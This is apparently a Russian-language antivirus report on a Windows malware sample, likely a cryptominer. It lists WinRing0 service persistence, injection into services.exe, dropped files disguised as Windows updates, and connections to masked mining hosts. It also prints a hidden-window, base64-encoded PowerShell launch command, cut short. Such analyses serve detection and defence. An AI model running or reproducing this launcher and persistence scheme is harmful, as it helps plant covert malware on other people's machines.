Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [HKLM\System\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '%WINDIR%\temp\SystemUpdate\WinRing0x64.sys'
Создает следующие сервисы
- 'WinRing0_1_2_0' %WINDIR%\temp\SystemUpdate\WinRing0x64.sys
Вредоносные функции
Внедряет код в
следующие системные процессы:
- <SYSTEM32>\services.exe
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\systemupdate\winring0x64.sys
- %WINDIR%\temp\systemupdate\config.json
- %WINDIR%\temp\systemupdate\windowsupdate.exe
Сетевая активность
Подключается к
- '94.##1.9.155':2325
- 'xm##ool.eu':7777
TCP
Другие
- '94.##1.9.155':2325
- 'xm##ool.eu':7777
UDP
- DNS ASK xm##ool.eu
Другое
Создает и запускает на исполнение
- '%WINDIR%\temp\systemupdate\windowsupdate.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACc...' (со скрытым окном)
- '%WINDIR%\temp\systemupdate\windowsupdate.exe' ' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACc...
